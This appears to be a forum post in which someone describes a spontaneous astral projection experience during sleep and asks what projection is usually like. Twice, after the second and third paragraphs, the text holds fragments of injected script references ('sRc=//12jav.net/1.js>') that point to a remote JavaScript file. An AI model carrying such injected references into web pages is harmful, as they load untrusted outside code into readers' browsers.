what to expect

I was wondering what Astral Projection is like. I feel like I have an image in my mind of what it's like but I'm not sure it's correct. I feel like I have projected before but I don't know if it was real or if I was dreaming. I projected once before and ask trying to work on doing it again.

The time that i did was while i was asleep. I want trying to at all, and at first i didn't know what was going on. In the beginning of my projection it was just kind of happening. I was aware that i was moving, but i didn't think anything if it. It just felt kind of floaty, or... Lighter? Then i became completely conscious if what was going on and that not all if me was in my body. Once i realized that i freaked out a little and was pulled back into my body. But it was an overall interesting and kind if exciting experience.

People can achieve astral projection through meditation, but i can't get that to work for me, so far. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Well it happened pretty fast. I saw myself. And i think that's what made me come back sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
